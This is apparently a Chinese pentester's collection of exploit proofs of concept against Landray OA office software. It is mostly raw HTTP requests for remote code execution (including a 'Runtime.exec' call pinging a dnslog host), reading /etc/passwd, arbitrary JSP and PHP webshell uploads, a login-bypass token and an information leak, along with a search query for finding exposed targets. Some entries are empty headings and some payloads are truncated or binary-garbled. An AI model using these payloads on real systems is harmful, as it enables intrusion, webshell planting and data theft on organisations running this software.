蓝凌OA系列

  • 蓝凌
    • poc-yaml-landray-oa-rce
    • poc-yaml-landray-oa-custom-jsp-fileread
    • landray-upload
    • zhihuidiaodupingtai-upload-file-upload
    • landray-sysZonePersonInfo-info-leak
    • landrayoa-2022-rce
    • landray-login-bypass
    • landray-login-bypass-rce
    • landray-getLoginSessionId-login-bypass
    • landray-getLoginSessionId-login-bypass-file-upload
    • landray-sysUiComponent-file-upload
    • 蓝凌 ERP
    • 蓝凌 OA sysUiComponent & sysUiExtend上传分析

是否利用过优先级从高到低发现日期从近到远公司团队名_产品名_大版本号_特定小版本号_接口文件名_漏洞类型@发现日期.载荷格式

LandrayOA_Custom_SSRF_JNDI漏洞
LandrayOA_sysSearchMain_Rce漏洞
LandrayOA_Custom_FileRead漏洞

蓝凌

app=“Landray-OA系统”

poc-yaml-landray-oa-rce

https://mp.weixin.qq.com/s/O5wGyJhKcddSyiEzmvOVJA

POST /data/sys-common/treexml.tmpl HTTP/1.1Host:Content-Type: application/x-www-form-urlencodedPragma: no-cacheCmd: cat /etc/passwds_bean=ruleFormulaValidate&script=\u0020\u0020\u0020\u0

poc-yaml-landray-oa-custom-jsp-fileread

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipvar={"body":{"file":"file:///etc/passwd"}}

landray-upload

POST /sys/attachment/sys_att_main/jg_service.jsp HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Accept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Connection: closePragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1Accept-Language: zh-CN,zh;q=0.9Content-Length: 210DBSTEP V3.01240999DBSTEP=REJTVEVQOPTION=U0FWRUFTSFRNTA==HTMLNAME=Li4vLi4vLi4vLi4vLi4vZWtwL3Jlc291cmNlL2Vsa3FmY3VmLmpzcA==RECORDID=DIRECTORY=elkqfcuf182323GET /resource/elkqfcuf.jsp HTTP/1.1Host: User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflateAccept: */*Connection: close

zhihuidiaodupingtai-upload-file-upload

POST /api/client/upload.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Length: 194------WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Disposition: form-data; name="ulfile"; filename="lztkkl.php"Content-Type: image/jpeg99647lztkkl------WebKitFormBoundaryVBf7Cs8QWsfwC82M--GET /upload/lztkkl.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0Accept-Encoding: gzip, deflateAccept: */*Connection: close

landray-sysZonePersonInfo-info-leak

/sys/zone/sys_zone_personInfo/sysZonePersonInfo.do" />.js?=&method=searchPerson&rowsize=50&orderby=&ordertype=up&s_ajax=true

landrayoa-2022-rce

/data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=function test(){ return java.lang.Runtime};r=test();r.getRuntime().exec("ping xxx.dnslog.cn")&type=1

landray-login-bypass

/sys/?outToken=MTE4M2IwYjg0ZWU0ZjU4MWJiYTAwMWM0N2E3OGIyZDk=

landray-login-bypass-rce

landray-getLoginSessionId-login-bypass

landray-getLoginSessionId-login-bypass-file-upload

landray-sysUiComponent-file-upload

蓝凌 ERP

蓝凌 OA sysUiComponent & sysUiExtend上传分析

https://mp.weixin.qq.com/s/kuKEmoqi7am98ORypTRnlQ

POST /sys/ui/sys_ui_component/sysUiComponent.do?method=getThemeInfo&s_ajax=true HTTP/1.1Host: xxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36Content-Length: 533Accept: */*Accept-Encoding: gzip, deflateConnection: closeContent-Type: multipart/form-data; boundary=epd2d4omyc4rqc5lv6c4--epd2d4omyc4rqc5lv6c4Content-Disposition: form-data; name="file"; filename="daqdajrnx03kihusgzbt.zip"Content-Type: application/x-zip-compressedPK;}W]]component.iniËL±5202æÊKÌMµ-ÉÌM-.IÌ-(ÖË*.PK;}W´@¨B`htimestamps.jspÈ1ƒ0 Ы° Å,¥ŒT;Wp«|QWV’×oa|ïÖ6yu.U[ñã¥ë"õ {ó‘MX3?Ô¤Ó—¸æÄ3|€ØSü*¾+?nDÝ ~6ñ„¿¨oï?PK;}W]]€component.iniPK;}W´@¨B`h€Htimestamps.jspPKwÔ--epd2d4omyc4rqc5lv6c4--